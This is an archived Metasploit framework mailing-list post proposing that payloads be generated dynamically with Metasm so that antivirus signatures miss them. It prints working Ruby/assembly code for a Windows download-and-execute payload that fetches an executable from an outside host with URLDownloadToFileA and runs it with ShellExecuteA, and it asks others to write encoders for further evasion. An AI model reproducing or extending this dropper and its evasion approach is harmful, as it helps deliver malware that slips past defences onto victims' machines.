[framework] Payload AV evasion thoughts...

[John B]

I brought up this idea a few months ago on the mailing list but there might
be some more interest in it now.  The idea is to use Metasm to dynamically
create payloads instead of using the base template.  I've been able to
produce a portable (XP-7) message box payload that is assembled on the fly,
but I don't have enough ASM experience to make it unique meaning if two
people use the same title and msg string then the payloads would be
identical. I've seen some work in the framework with Metasm created encoders
for Mips<https://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/encoders/mipsbe/longxor.rb>
and
outside the framework with a smiley
encoder<http://www.cr0.org/misc/smile.rb>for IM exploits.

Heres an example of how a basic download execute payload would look like
(example only probably not the most AV evasive way):

////code


require 'metasm'

pe = Metasm::PE.assemble Metasm::Ia32.new, <<EOS

.entrypoint

push 0
push 0
push PATH
push URL
push 0
call download

push 0
push 0
push 0
push PATH
push CMD
push 0
call execute

ret

.import 'shell32' ShellExecuteA execute
.import 'urlmon' URLDownloadToFileA download

.data

URL db "http://someaddress.com/download/hellow.exe
<http://imperiumsec.com/download/hellow.exe>", 0
PATH db "c:/users/john/testd.exe",0
CMD db "open",0

EOS

pe.encode_file 'down.exe'

///////end code

Combine that with code to make it portable across all systems then add
a encoding stub and we can create unique payloads every time with out
the need for templates (with the assumption that the templates are the
main way of detecting payloads).

I will continue to work on some full examples but anyone with asm
experience who could create some dynamic encoders with Metasm would
really be helpful.




John
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20110418/0e9e9ab1/attachment.html>